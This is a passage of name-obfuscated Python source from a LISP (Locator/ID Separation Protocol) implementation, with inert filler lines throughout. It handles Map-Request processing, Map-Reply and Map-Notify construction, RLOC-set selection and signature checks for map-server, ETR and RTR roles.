if ( OOO0Oo0o == 0 ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
else :
ii1iII11 = ddt_entry . delegation_set [ 0 ]
if ( ii1iII11 . is_ddt_child ( ) ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
if 93 - 93: OOooOOo / OoooooooOO % iII111i
if ( ii1iII11 . is_ms_child ( ) ) :
action = LISP_DDT_ACTION_MS_REFERRAL
if 47 - 47: o0oOOo0O0Ooo - I1IiiI % O0 % I1Ii111 . O0 . OoOoOO00
if 95 - 95: o0oOOo0O0Ooo * OOooOOo - iII111i * OoooooooOO - ooOoO0o / I1IiiI
if 47 - 47: OoO0O00 % I1IiiI / OoOoOO00 - I1Ii111 / I1IiiI
if 13 - 13: o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: iII111i * I1IiiI . iIii1I11I1II1 % I1IiiI / O0
if 47 - 47: OoooooooOO - i11iIiiIii . I1IiiI / i1IIi
if 74 - 74: OoooooooOO * ooOoO0o
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : IiiIIiIi1i11i = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
IiiIIiIi1i11i = ( lisp_i_am_ms and ii1iII11 . is_ms_peer ( ) == False )
if 45 - 45: Oo0Ooo + iIii1I11I1II1 . o0oOOo0O0Ooo
if 50 - 50: o0oOOo0O0Ooo % O0
iiI . action = action
iiI . ddt_incomplete = IiiIIiIi1i11i
iiI . record_ttl = ttl
if 67 - 67: OoOoOO00
IIii1i += iiI . encode ( )
iiI . print_record ( " " , True )
if 21 - 21: I11i % Oo0Ooo + Oo0Ooo / iIii1I11I1II1 % iIii1I11I1II1
if ( OOO0Oo0o == 0 ) : return ( IIii1i )
if 66 - 66: iII111i
for ii1iII11 in ddt_entry . delegation_set :
iIii1IiIiI = lisp_rloc_record ( )
iIii1IiIiI . rloc = ii1iII11 . delegate_address
iIii1IiIiI . priority = ii1iII11 . priority
iIii1IiIiI . weight = ii1iII11 . weight
iIii1IiIiI . mpriority = 255
iIii1IiIiI . mweight = 0
iIii1IiIiI . reach_bit = True
IIii1i += iIii1IiIiI . encode ( )
iIii1IiIiI . print_record ( " " )
if 72 - 72: ooOoO0o / oO0o / iII111i . I1Ii111 . I1ii11iIi11i + IiII
return ( IIii1i )
if 39 - 39: I1IiiI % I1Ii111
if 22 - 22: OoOoOO00 - OOooOOo % i1IIi + i1IIi
if 28 - 28: oO0o + OoOoOO00 * Ii1I . I11i
if 80 - 80: I1ii11iIi11i / OoOoOO00
if 74 - 74: I1ii11iIi11i + O0 + o0oOOo0O0Ooo - iII111i
if 48 - 48: ooOoO0o * iIii1I11I1II1 % Oo0Ooo
if 60 - 60: OoOoOO00 / i1IIi * iIii1I11I1II1
def lisp_etr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl ) :
if 91 - 91: I1Ii111 . OoooooooOO / IiII / I1IiiI
if ( map_request . target_group . is_null ( ) ) :
Ooooo00 = lisp_db_for_lookups . lookup_cache ( map_request . target_eid , False )
else :
Ooooo00 = lisp_db_for_lookups . lookup_cache ( map_request . target_group , False )
if ( Ooooo00 ) : Ooooo00 = Ooooo00 . lookup_source_cache ( map_request . target_eid , False )
if 91 - 91: OoOoOO00 + OoOoOO00
I11i11i1 = map_request . print_prefix ( )
if 73 - 73: i11iIiiIii . OoO0O00 + ooOoO0o
if ( Ooooo00 == None ) :
lprint ( "Database-mapping entry not found for requested EID {}" . format ( green ( I11i11i1 , False ) ) )
if 77 - 77: ooOoO0o . I11i + OoooooooOO
return
if 100 - 100: ooOoO0o . oO0o % I1ii11iIi11i . IiII * IiII - o0oOOo0O0Ooo
if 49 - 49: iIii1I11I1II1 % Ii1I / OoooooooOO - II111iiii . Ii1I
Oo00O0o = Ooooo00 . print_eid_tuple ( )
if 28 - 28: OoooooooOO / I1Ii111 / i1IIi
lprint ( "Found database-mapping EID-prefix {} for requested EID {}" . format ( green ( Oo00O0o , False ) , green ( I11i11i1 , False ) ) )
if 35 - 35: IiII / iIii1I11I1II1 - I1IiiI - OoO0O00 * O0
if 97 - 97: Oo0Ooo . i1IIi
if 56 - 56: Ii1I
if 2 - 2: i1IIi % oO0o + O0 - OoO0O00
if 34 - 34: ooOoO0o + oO0o - Oo0Ooo
oO00o0o0O = map_request . itr_rlocs [ 0 ]
if ( oO00o0o0O . is_private_address ( ) and lisp_nat_traversal ) :
oO00o0o0O = source
if 50 - 50: o0oOOo0O0Ooo + Oo0Ooo + i1IIi
if 79 - 79: Ii1I / II111iiii . I1ii11iIi11i
oOO000 = map_request . nonce
oO0O0o00oOo = lisp_nonce_echoing
oOoo0oO = map_request . keys
if 82 - 82: IiII . O0 . iIii1I11I1II1 / ooOoO0o / OoooooooOO / OoooooooOO
Ooooo00 . map_replies_sent += 1
if 98 - 98: O0 . oO0o * O0
IIii1i = lisp_build_map_reply ( Ooooo00 . eid , Ooooo00 . group , Ooooo00 . rloc_set , oOO000 ,
LISP_NO_ACTION , 1440 , map_request . rloc_probe , oOoo0oO , oO0O0o00oOo , True , ttl )
if 87 - 87: iII111i + iII111i + iII111i % I11i
if 2 - 2: OOooOOo * O0 - OoOoOO00 * I1Ii111 - oO0o + I1ii11iIi11i
if 47 - 47: ooOoO0o + I1ii11iIi11i
if 40 - 40: OoooooooOO
if 20 - 20: OOooOOo / O0
if 51 - 51: ooOoO0o - I1Ii111 * oO0o
if 47 - 47: Oo0Ooo % OoO0O00 * Ii1I / OoOoOO00
if 1 - 1: I1IiiI
if 68 - 68: ooOoO0o
if 68 - 68: I11i % IiII
if 1 - 1: I1IiiI + OOooOOo - OOooOOo * O0 + o0oOOo0O0Ooo * OOooOOo
if 48 - 48: ooOoO0o - iII111i + I1ii11iIi11i * I1Ii111 % ooOoO0o * OoO0O00
if 28 - 28: i1IIi / iII111i + OOooOOo
if 89 - 89: Oo0Ooo + II111iiii * OoO0O00 + Oo0Ooo % II111iiii
if 59 - 59: O0 + Oo0Ooo
if 63 - 63: OoO0O00 / I1IiiI / oO0o . Ii1I / i1IIi
if ( map_request . rloc_probe and len ( lisp_sockets ) == 4 ) :
ii1i11iiII = ( oO00o0o0O . is_private_address ( ) == False )
ooOoOo0O = oO00o0o0O . print_address_no_iid ( )
if ( ( ii1i11iiII and lisp_rtr_list . has_key ( ooOoOo0O ) ) or sport == 0 ) :
lisp_encapsulate_rloc_probe ( lisp_sockets , oO00o0o0O , None , IIii1i )
return
if 50 - 50: I11i . I11i % I1IiiI - i1IIi
if 63 - 63: OoO0O00 . iII111i
if 28 - 28: ooOoO0o . Oo0Ooo - OoooooooOO - I1Ii111 - OoooooooOO - oO0o
if 25 - 25: I11i / I1Ii111 . i11iIiiIii % i1IIi
if 21 - 21: O0 * IiII . iII111i / iII111i % i11iIiiIii / I11i
if 15 - 15: o0oOOo0O0Ooo / OoO0O00 - i1IIi
lisp_send_map_reply ( lisp_sockets , IIii1i , oO00o0o0O , sport )
return
if 30 - 30: OoO0O00 / ooOoO0o % ooOoO0o
if 40 - 40: i1IIi . iIii1I11I1II1 * OoOoOO00
if 83 - 83: iIii1I11I1II1 + Ii1I - Ii1I % II111iiii
if 82 - 82: O0
if 18 - 18: iII111i . IiII . I1IiiI
if 40 - 40: IiII / oO0o + OoooooooOO / iII111i / II111iiii + i1IIi
if 33 - 33: I11i + I1ii11iIi11i + i11iIiiIii * I1IiiI % oO0o % OoooooooOO
def lisp_rtr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl ) :
if 4 - 4: OoO0O00 . I1IiiI - O0 % iII111i . OOooOOo
if 69 - 69: OoooooooOO
if 19 - 19: O0 + iIii1I11I1II1 / OoOoOO00 / oO0o + II111iiii - OOooOOo
if 70 - 70: i1IIi * o0oOOo0O0Ooo + I1Ii111 . ooOoO0o - O0 + i11iIiiIii
oO00o0o0O = map_request . itr_rlocs [ 0 ]
if ( oO00o0o0O . is_private_address ( ) ) : oO00o0o0O = source
oOO000 = map_request . nonce
if 81 - 81: iIii1I11I1II1 - OoO0O00 . i11iIiiIii
OOo0O0O0o0 = map_request . target_eid
O0o00oOOOO00 = map_request . target_group
if 4 - 4: o0oOOo0O0Ooo / OoO0O00 - I11i
ooo0oo = [ ]
for OOOOOo0O0oOO in [ lisp_myrlocs [ 0 ] , lisp_myrlocs [ 1 ] ] :
if ( OOOOOo0O0oOO == None ) : continue
oOo00O = lisp_rloc ( )
oOo00O . rloc . copy_address ( OOOOOo0O0oOO )
oOo00O . priority = 254
ooo0oo . append ( oOo00O )
if 99 - 99: OoO0O00 * I11i
if 33 - 33: I1Ii111 % IiII * OOooOOo - I1Ii111
oO0O0o00oOo = lisp_nonce_echoing
oOoo0oO = map_request . keys
if 100 - 100: ooOoO0o . i11iIiiIii * Oo0Ooo - i11iIiiIii
IIii1i = lisp_build_map_reply ( OOo0O0O0o0 , O0o00oOOOO00 , ooo0oo , oOO000 , LISP_NO_ACTION ,
1440 , True , oOoo0oO , oO0O0o00oOo , True , ttl )
lisp_send_map_reply ( lisp_sockets , IIii1i , oO00o0o0O , sport )
return
if 72 - 72: oO0o + I11i . OoooooooOO
if 84 - 84: oO0o * oO0o - i1IIi + ooOoO0o
if 83 - 83: i1IIi
if 85 - 85: i11iIiiIii / OoO0O00 / oO0o
if 12 - 12: iII111i % OOooOOo % i1IIi
if 17 - 17: IiII
if 63 - 63: ooOoO0o . i11iIiiIii / iIii1I11I1II1
if 8 - 8: i11iIiiIii . IiII * iIii1I11I1II1 * I1IiiI * Ii1I * i11iIiiIii
if 24 - 24: I1IiiI * I11i - o0oOOo0O0Ooo / iII111i + IiII - I1ii11iIi11i
if 53 - 53: I11i / I1IiiI - iIii1I11I1II1 - o0oOOo0O0Ooo * OoOoOO00
def lisp_get_private_rloc_set ( target_site_eid , seid , group ) :
ooo0oo = target_site_eid . registered_rlocs
if 86 - 86: iIii1I11I1II1 - I1Ii111
OoO0OOOOO0OO = lisp_site_eid_lookup ( seid , group , False )
if ( OoO0OOOOO0OO == None ) : return ( ooo0oo )
if 5 - 5: o0oOOo0O0Ooo
if 58 - 58: oO0o * II111iiii * Oo0Ooo - I1IiiI % iII111i
if 77 - 77: I11i / iII111i * o0oOOo0O0Ooo % iIii1I11I1II1
if 26 - 26: i1IIi / OoO0O00 / IiII
oO00OoO0O0O = None
I1III = [ ]
for iIII in ooo0oo :
if ( iIII . is_rtr ( ) ) : continue
if ( iIII . rloc . is_private_address ( ) ) :
I1iiI1 = copy . deepcopy ( iIII )
I1III . append ( I1iiI1 )
continue
if 74 - 74: I1ii11iIi11i / i11iIiiIii - II111iiii . Oo0Ooo / ooOoO0o
oO00OoO0O0O = iIII
break
if 55 - 55: OoO0O00 % IiII
if ( oO00OoO0O0O == None ) : return ( ooo0oo )
oO00OoO0O0O = oO00OoO0O0O . rloc . print_address_no_iid ( )
if 93 - 93: OoO0O00 . I1ii11iIi11i / OOooOOo % OoooooooOO + i1IIi + I1Ii111
if 94 - 94: II111iiii + i11iIiiIii % Ii1I / ooOoO0o * OoOoOO00
if 68 - 68: O0 / Oo0Ooo / iIii1I11I1II1
if 63 - 63: I1Ii111 + iII111i
iI1III = None
for iIII in OoO0OOOOO0OO . registered_rlocs :
if ( iIII . is_rtr ( ) ) : continue
if ( iIII . rloc . is_private_address ( ) ) : continue
iI1III = iIII
break
if 84 - 84: ooOoO0o % I1ii11iIi11i + i1IIi * ooOoO0o + OOooOOo - IiII
if ( iI1III == None ) : return ( ooo0oo )
iI1III = iI1III . rloc . print_address_no_iid ( )
if 42 - 42: Ii1I - i11iIiiIii + I11i * O0
if 51 - 51: i1IIi . Oo0Ooo + OoOoOO00 / OoooooooOO / oO0o
if 58 - 58: I1ii11iIi11i / Ii1I * ooOoO0o - IiII
if 67 - 67: ooOoO0o - ooOoO0o * o0oOOo0O0Ooo
I1111iii1ii11 = target_site_eid . site_id
if ( I1111iii1ii11 == 0 ) :
if ( iI1III == oO00OoO0O0O ) :
lprint ( "Return private RLOCs for sites behind {}" . format ( oO00OoO0O0O ) )
if 65 - 65: O0
return ( I1III )
if 37 - 37: I1ii11iIi11i - Oo0Ooo . i11iIiiIii / i11iIiiIii + oO0o
return ( ooo0oo )
if 19 - 19: i1IIi / i1IIi - OoooooooOO - OOooOOo . i1IIi
if 57 - 57: OOooOOo / I1ii11iIi11i * oO0o
if 53 - 53: o0oOOo0O0Ooo * Ii1I
if 42 - 42: I11i + iII111i / iIii1I11I1II1
if 1 - 1: O0 - II111iiii
if 75 - 75: II111iiii / OoO0O00 % II111iiii
if 3 - 3: Ii1I - Ii1I % I1ii11iIi11i
if ( I1111iii1ii11 == OoO0OOOOO0OO . site_id ) :
lprint ( "Return private RLOCs for sites in site-id {}" . format ( I1111iii1ii11 ) )
return ( I1III )
if 44 - 44: OOooOOo - o0oOOo0O0Ooo
return ( ooo0oo )
if 69 - 69: IiII + I1ii11iIi11i / o0oOOo0O0Ooo / OOooOOo
if 31 - 31: oO0o + I1ii11iIi11i * i1IIi % I1IiiI % I1IiiI + iIii1I11I1II1
if 62 - 62: OoooooooOO
if 38 - 38: iII111i % iII111i * ooOoO0o / OoO0O00 + ooOoO0o
if 52 - 52: ooOoO0o . iIii1I11I1II1 / iIii1I11I1II1 % oO0o - oO0o * II111iiii
if 57 - 57: I1Ii111
if 23 - 23: I1ii11iIi11i + II111iiii
if 99 - 99: o0oOOo0O0Ooo . I1IiiI + o0oOOo0O0Ooo * o0oOOo0O0Ooo / O0
if 27 - 27: OOooOOo - I1Ii111
def lisp_get_partial_rloc_set ( registered_rloc_set , mr_source , multicast ) :
III1I1IIi = [ ]
ooo0oo = [ ]
if 89 - 89: iIii1I11I1II1 * I11i + OOooOOo
if 27 - 27: i1IIi - OoO0O00
if 23 - 23: iIii1I11I1II1 + Oo0Ooo * IiII
if 80 - 80: OoooooooOO . ooOoO0o
if 52 - 52: O0 + O0 + I1IiiI
if 64 - 64: ooOoO0o
II = False
i1Ii = False
for iIII in registered_rloc_set :
if ( iIII . priority != 254 ) : continue
i1Ii |= True
if ( iIII . rloc . is_exact_match ( mr_source ) == False ) : continue
II = True
break
if 9 - 9: OoooooooOO / OoooooooOO
if 57 - 57: OoO0O00 + i1IIi % OOooOOo * i11iIiiIii % i1IIi / o0oOOo0O0Ooo
if 1 - 1: ooOoO0o
if 81 - 81: iII111i . Oo0Ooo . O0 . II111iiii
if 46 - 46: I1Ii111 % Ii1I - I1ii11iIi11i + iIii1I11I1II1 + OoooooooOO . oO0o
if 43 - 43: i1IIi % o0oOOo0O0Ooo * I1IiiI / oO0o * IiII + I11i
if 13 - 13: O0
if ( i1Ii == False ) : return ( registered_rloc_set )
if 60 - 60: IiII
if 14 - 14: II111iiii - i1IIi % OoOoOO00
if 29 - 29: OoooooooOO * O0 / iIii1I11I1II1
if 29 - 29: OoO0O00 / IiII + i1IIi / OoO0O00 . Oo0Ooo
if 52 - 52: OoOoOO00 . iIii1I11I1II1 / OoOoOO00
if 14 - 14: i1IIi
if 63 - 63: OoOoOO00 . i11iIiiIii / IiII
if 36 - 36: OOooOOo * OoOoOO00 + i11iIiiIii + O0 + O0
if 18 - 18: Oo0Ooo . I1ii11iIi11i * ooOoO0o % Ii1I + I1ii11iIi11i
if 23 - 23: oO0o / o0oOOo0O0Ooo + I11i % IiII * OoO0O00
iiiiIii = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 40 - 40: Ii1I % oO0o
if 69 - 69: iIii1I11I1II1 - O0 . I1Ii111 % I1IiiI / o0oOOo0O0Ooo
if 78 - 78: oO0o
if 20 - 20: i1IIi + i1IIi * i1IIi
if 32 - 32: I1IiiI + IiII + iII111i . iIii1I11I1II1 * Ii1I
for iIII in registered_rloc_set :
if ( iiiiIii and iIII . rloc . is_private_address ( ) ) : continue
if ( multicast == False and iIII . priority == 255 ) : continue
if ( multicast and iIII . mpriority == 255 ) : continue
if ( iIII . priority == 254 ) :
III1I1IIi . append ( iIII )
else :
ooo0oo . append ( iIII )
if 27 - 27: oO0o + Ii1I . i11iIiiIii
if 97 - 97: iII111i . I1IiiI
if 71 - 71: OOooOOo - IiII % oO0o * I1ii11iIi11i
if 48 - 48: o0oOOo0O0Ooo * iIii1I11I1II1 + Oo0Ooo
if 45 - 45: oO0o
if 50 - 50: Ii1I * Ii1I / O0 . Oo0Ooo + iII111i
if ( II ) : return ( ooo0oo )
if 9 - 9: OoooooooOO % O0 % I1ii11iIi11i
if 100 - 100: i11iIiiIii - iII111i - I11i
if 5 - 5: oO0o % IiII * iII111i
if 98 - 98: iII111i / OOooOOo + IiII
if 100 - 100: II111iiii . i11iIiiIii / oO0o - OOooOOo + OoOoOO00 % I1ii11iIi11i
if 82 - 82: ooOoO0o % OOooOOo % Ii1I
if 82 - 82: I1ii11iIi11i
if 52 - 52: i11iIiiIii % I1Ii111 - iII111i / O0 - I1ii11iIi11i / iII111i
if 7 - 7: OoooooooOO . OOooOOo . OOooOOo
if 53 - 53: OOooOOo * OoOoOO00 % iII111i
ooo0oo = [ ]
for iIII in registered_rloc_set :
if ( iIII . rloc . is_private_address ( ) ) : ooo0oo . append ( iIII )
if 86 - 86: OOooOOo . OOooOOo + IiII - I1ii11iIi11i . OoO0O00
ooo0oo += III1I1IIi
return ( ooo0oo )
if 66 - 66: I1IiiI * OoOoOO00 . I1IiiI / Oo0Ooo - Ii1I
if 69 - 69: iIii1I11I1II1 % iII111i + ooOoO0o * i1IIi + iII111i * I1Ii111
if 67 - 67: Ii1I % Oo0Ooo - Oo0Ooo . I11i + IiII
if 73 - 73: Oo0Ooo + iIii1I11I1II1 . iIii1I11I1II1
if 73 - 73: ooOoO0o + OoOoOO00
if 61 - 61: I1Ii111 * I1Ii111 % OOooOOo
if 31 - 31: oO0o + Ii1I - iIii1I11I1II1 / i11iIiiIii
if 9 - 9: IiII % OoO0O00
if 58 - 58: iII111i
if 12 - 12: OoO0O00
def lisp_store_pubsub_state ( reply_eid , itr_rloc , mr_sport , nonce , ttl , xtr_id ) :
o0oo0O = lisp_pubsub ( itr_rloc , mr_sport , nonce , ttl , xtr_id )
o0oo0O . add ( reply_eid )
return
if 22 - 22: iIii1I11I1II1 + Ii1I
if 73 - 73: I1IiiI / OoO0O00 / OoooooooOO
if 14 - 14: ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i . IiII + I1ii11iIi11i
if 30 - 30: I1ii11iIi11i + iIii1I11I1II1 . I1ii11iIi11i
if 9 - 9: I1IiiI - Ii1I * II111iiii - I11i
if 85 - 85: oO0o % ooOoO0o / OOooOOo
if 50 - 50: O0 * O0 / iIii1I11I1II1
if 31 - 31: I1IiiI / o0oOOo0O0Ooo
if 70 - 70: I1IiiI
if 36 - 36: ooOoO0o . oO0o . I11i - I1ii11iIi11i / OoOoOO00 * Oo0Ooo
if 42 - 42: OoooooooOO / o0oOOo0O0Ooo . Ii1I * iII111i * I1IiiI - Oo0Ooo
if 76 - 76: oO0o * II111iiii
if 81 - 81: I11i
if 2 - 2: OoOoOO00
if 75 - 75: I1IiiI - OoooooooOO * I1Ii111
def lisp_convert_reply_to_notify ( packet ) :
if 1 - 1: o0oOOo0O0Ooo % oO0o * I1Ii111 - i1IIi - iII111i . oO0o
if 25 - 25: i1IIi * o0oOOo0O0Ooo / oO0o
if 11 - 11: IiII + II111iiii
if 37 - 37: O0
o0oo0OoOo000 = struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ]
o0oo0OoOo000 = socket . ntohl ( o0oo0OoOo000 ) & 0xff
oOO000 = packet [ 4 : 12 ]
packet = packet [ 12 : : ]
if 35 - 35: I11i + OoooooooOO
if 67 - 67: iII111i . OoO0O00 . i1IIi - Oo0Ooo
if 92 - 92: I1Ii111 % II111iiii % I11i % O0 . I1Ii111 % o0oOOo0O0Ooo
if 99 - 99: I1ii11iIi11i
ooo0OOoo = ( LISP_MAP_NOTIFY << 28 ) | o0oo0OoOo000
Ii1I1i1IiiI = struct . pack ( "I" , socket . htonl ( ooo0OOoo ) )
iI1 = struct . pack ( "I" , 0 )
if 78 - 78: OoooooooOO
if 14 - 14: O0 % OoooooooOO
if 92 - 92: oO0o
if 49 - 49: i11iIiiIii + OoO0O00 - OOooOOo
packet = Ii1I1i1IiiI + oOO000 + iI1 + packet
return ( packet )
if 9 - 9: II111iiii * OOooOOo / Oo0Ooo + iIii1I11I1II1 % I1IiiI
if 95 - 95: I1Ii111 . IiII % OoO0O00 - OOooOOo - I11i
if 55 - 55: OoooooooOO % I1ii11iIi11i % iII111i / IiII
if 65 - 65: II111iiii
if 58 - 58: iIii1I11I1II1 / i11iIiiIii . iII111i . OOooOOo * I1ii11iIi11i + OoooooooOO
if 13 - 13: OoooooooOO + iII111i * i11iIiiIii % IiII + oO0o . o0oOOo0O0Ooo
if 31 - 31: o0oOOo0O0Ooo - ooOoO0o
if 40 - 40: O0 / OoOoOO00 - I1Ii111
def lisp_notify_subscribers ( lisp_sockets , eid_record , eid , site ) :
I11i11i1 = eid . print_prefix ( )
if ( lisp_pubsub_cache . has_key ( I11i11i1 ) == False ) : return
if 60 - 60: IiII + I1IiiI
for o0oo0O in lisp_pubsub_cache [ I11i11i1 ] . values ( ) :
III1iii1 = o0oo0O . itr
IiI1iI1 = o0oo0O . port
o00O00 = red ( III1iii1 . print_address_no_iid ( ) , False )
iI1iiiI1 = bold ( "subscriber" , False )
oooOOOO0oOo = "0x" + lisp_hex_string ( o0oo0O . xtr_id )
oOO000 = "0x" + lisp_hex_string ( o0oo0O . nonce )
if 77 - 77: OoooooooOO / I11i / iIii1I11I1II1 . IiII * Oo0Ooo * I1Ii111
lprint ( " Notify {} {}:{} xtr-id {} for {}, nonce {}" . format ( iI1iiiI1 , o00O00 , IiI1iI1 , oooOOOO0oOo , green ( I11i11i1 , False ) , oOO000 ) )
if 48 - 48: i1IIi
if 79 - 79: iIii1I11I1II1
lisp_build_map_notify ( lisp_sockets , eid_record , [ I11i11i1 ] , 1 , III1iii1 ,
IiI1iI1 , o0oo0O . nonce , 0 , 0 , 0 , site , False )
o0oo0O . map_notify_count += 1
if 25 - 25: II111iiii % OoO0O00 / iII111i % i11iIiiIii + oO0o % I11i
return
if 66 - 66: I1ii11iIi11i - oO0o - OoO0O00 * Oo0Ooo
if 47 - 47: o0oOOo0O0Ooo
if 88 - 88: iIii1I11I1II1 + OOooOOo . II111iiii / i11iIiiIii % OOooOOo % IiII
if 38 - 38: OOooOOo
if 82 - 82: OoOoOO00 % II111iiii * ooOoO0o + OoooooooOO + I1IiiI
if 89 - 89: ooOoO0o % i1IIi - OoooooooOO
if 100 - 100: Ii1I % I1ii11iIi11i % I1IiiI
def lisp_process_pubsub ( lisp_sockets , packet , reply_eid , itr_rloc , port , nonce ,
ttl , xtr_id ) :
if 19 - 19: I1ii11iIi11i . o0oOOo0O0Ooo % Oo0Ooo / OoooooooOO
if 68 - 68: iII111i
if 55 - 55: IiII . i11iIiiIii % OoooooooOO
if 88 - 88: Ii1I * o0oOOo0O0Ooo / oO0o
lisp_store_pubsub_state ( reply_eid , itr_rloc , port , nonce , ttl , xtr_id )
if 58 - 58: O0
OOo0O0O0o0 = green ( reply_eid . print_prefix ( ) , False )
III1iii1 = red ( itr_rloc . print_address_no_iid ( ) , False )
IiiiO000oO = bold ( "Map-Notify" , False )
xtr_id = "0x" + lisp_hex_string ( xtr_id )
lprint ( "{} pubsub request for {} to ack ITR {} xtr-id: {}" . format ( IiiiO000oO ,
OOo0O0O0o0 , III1iii1 , xtr_id ) )
if 1 - 1: I1Ii111 * OOooOOo - Ii1I - Oo0Ooo
if 79 - 79: I11i - Ii1I + i1IIi
if 94 - 94: Oo0Ooo * iII111i - I11i - OoooooooOO / I1Ii111
if 59 - 59: iII111i / i11iIiiIii / I1IiiI
packet = lisp_convert_reply_to_notify ( packet )
lisp_send_map_notify ( lisp_sockets , packet , itr_rloc , port )
return
if 7 - 7: i1IIi - OOooOOo
if 11 - 11: O0 * OoOoOO00 - OOooOOo + iII111i * OoO0O00
if 41 - 41: I1Ii111 - i11iIiiIii + O0
if 24 - 24: iIii1I11I1II1 * OoO0O00 / iII111i % OoOoOO00 % i11iIiiIii * I11i
if 89 - 89: oO0o / iIii1I11I1II1 - O0 . o0oOOo0O0Ooo % oO0o
if 73 - 73: IiII + I11i % I1IiiI * iII111i . O0
if 17 - 17: OoO0O00 * OoOoOO00 % O0 % iII111i / i1IIi
if 100 - 100: i11iIiiIii
def lisp_ms_process_map_request ( lisp_sockets , packet , map_request , mr_source ,
mr_sport , ecm_source ) :
if 54 - 54: O0 * Ii1I + Ii1I
if 59 - 59: i11iIiiIii % iII111i
if 54 - 54: I11i . ooOoO0o / OOooOOo % I1Ii111
if 13 - 13: I11i / O0 . o0oOOo0O0Ooo . ooOoO0o
if 7 - 7: OoO0O00 + OoooooooOO % II111iiii % oO0o
if 48 - 48: OOooOOo . II111iiii * OOooOOo - I11i / iIii1I11I1II1 / i11iIiiIii
OOo0O0O0o0 = map_request . target_eid
O0o00oOOOO00 = map_request . target_group
I11i11i1 = lisp_print_eid_tuple ( OOo0O0O0o0 , O0o00oOOOO00 )
oO00o0o0O = map_request . itr_rlocs [ 0 ]
oooOOOO0oOo = map_request . xtr_id
oOO000 = map_request . nonce
OOo000 = LISP_NO_ACTION
o0oo0O = map_request . subscribe_bit
if 37 - 37: II111iiii % O0 + iIii1I11I1II1 - I1IiiI . I11i + I1ii11iIi11i
if 14 - 14: ooOoO0o % iIii1I11I1II1 % ooOoO0o / IiII + OOooOOo
if 14 - 14: Oo0Ooo
if 79 - 79: I1ii11iIi11i % I1Ii111 % I11i - iII111i * OoOoOO00
if 48 - 48: O0 + OoOoOO00 - O0
O0o = True
IiIii1II1I11 = ( lisp_get_eid_hash ( OOo0O0O0o0 ) != None )
if ( IiIii1II1I11 ) :
o00 = map_request . map_request_signature
if ( o00 == None ) :
O0o = False
lprint ( ( "EID-crypto-hash signature verification {}, " + "no signature found" ) . format ( bold ( "failed" , False ) ) )
if 23 - 23: I1ii11iIi11i
else :
O000oOO0Oooo = map_request . signature_eid
oO00oO0OOoooO , OO0o0OOO0ooOO00o , O0o = lisp_lookup_public_key ( O000oOO0Oooo )
if ( O0o ) :
O0o = map_request . verify_map_request_sig ( OO0o0OOO0ooOO00o )
else :
lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( O000oOO0Oooo . print_address ( ) , oO00oO0OOoooO . print_address ( ) ) )
if 98 - 98: O0 * OoOoOO00 + OoooooooOO - I1IiiI % OOooOOo
if 35 - 35: I1IiiI / Ii1I / i11iIiiIii
O0O0OO0O0O = bold ( "passed" , False ) if O0o else bold ( "failed" , False )
lprint ( "EID-crypto-hash signature verification {}" . format ( O0O0OO0O0O ) )
if 90 - 90: ooOoO0o
if 11 - 11: OoOoOO00 % OOooOOo . i11iIiiIii * I1IiiI % O0 % iIii1I11I1II1
if 18 - 18: Oo0Ooo % OOooOOo + IiII
if ( o0oo0O and O0o == False ) :
o0oo0O = False
lprint ( "Suppress creating pubsub state due to signature failure" )
if 28 - 28: OOooOOo . OoO0O00 / o0oOOo0O0Ooo + II111iiii / iIii1I11I1II1 * II111iiii
if 83 - 83: II111iiii . OoOoOO00 - i11iIiiIii . OoOoOO00 . i1IIi % OoooooooOO
if 47 - 47: II111iiii
if 30 - 30: i1IIi . Oo0Ooo / o0oOOo0O0Ooo + IiII * OOooOOo
if 26 - 26: Ii1I % O0 - i1IIi % iII111i * OoO0O00
if 60 - 60: I1ii11iIi11i * iII111i / OoOoOO00 . o0oOOo0O0Ooo / iIii1I11I1II1
if 94 - 94: OoO0O00 . ooOoO0o
if 25 - 25: I1Ii111 % OOooOOo
if 82 - 82: Ii1I
if 17 - 17: iII111i . i1IIi . i1IIi
if 76 - 76: OoooooooOO % IiII
if 81 - 81: iII111i . OOooOOo * i1IIi
if 14 - 14: oO0o
if 16 - 16: iII111i
I11oo = oO00o0o0O if ( oO00o0o0O . afi == ecm_source . afi ) else ecm_source
if 74 - 74: Ii1I / iIii1I11I1II1 + OOooOOo . II111iiii
oO00Oooo0o0o0 = lisp_site_eid_lookup ( OOo0O0O0o0 , O0o00oOOOO00 , False )
if 67 - 67: I1IiiI % OoO0O00 % o0oOOo0O0Ooo % IiII
if ( oO00Oooo0o0o0 == None or oO00Oooo0o0o0 . is_star_g ( ) ) :
i1i1IiIIIiI = bold ( "Site not found" , False )
lprint ( "{} for requested EID {}" . format ( i1i1IiIIIiI ,
green ( I11i11i1 , False ) ) )
if 82 - 82: OoooooooOO * OoooooooOO / I1ii11iIi11i - iII111i
if 52 - 52: I11i * IiII - o0oOOo0O0Ooo / I1Ii111 + OoOoOO00
if 5 - 5: O0 - IiII % iII111i
if 81 - 81: iII111i % Oo0Ooo * II111iiii
lisp_send_negative_map_reply ( lisp_sockets , OOo0O0O0o0 , O0o00oOOOO00 , oOO000 , oO00o0o0O ,
mr_sport , 15 , oooOOOO0oOo , o0oo0O )
if 71 - 71: II111iiii + I1ii11iIi11i * II111iiii
return ( [ OOo0O0O0o0 , O0o00oOOOO00 , LISP_DDT_ACTION_SITE_NOT_FOUND ] )
if 59 - 59: OoO0O00
if 81 - 81: i11iIiiIii
Oo00O0o = oO00Oooo0o0o0 . print_eid_tuple ( )
OOOo0O00OO00O = oO00Oooo0o0o0 . site . site_name
if 91 - 91: Oo0Ooo - iIii1I11I1II1 - iII111i . OoooooooOO . iII111i + Oo0Ooo
if 20 - 20: OoO0O00 . ooOoO0o - IiII
if 82 - 82: oO0o
if 26 - 26: I1ii11iIi11i
if 40 - 40: OOooOOo
if ( IiIii1II1I11 == False and oO00Oooo0o0o0 . require_signature ) :
o00 = map_request . map_request_signature
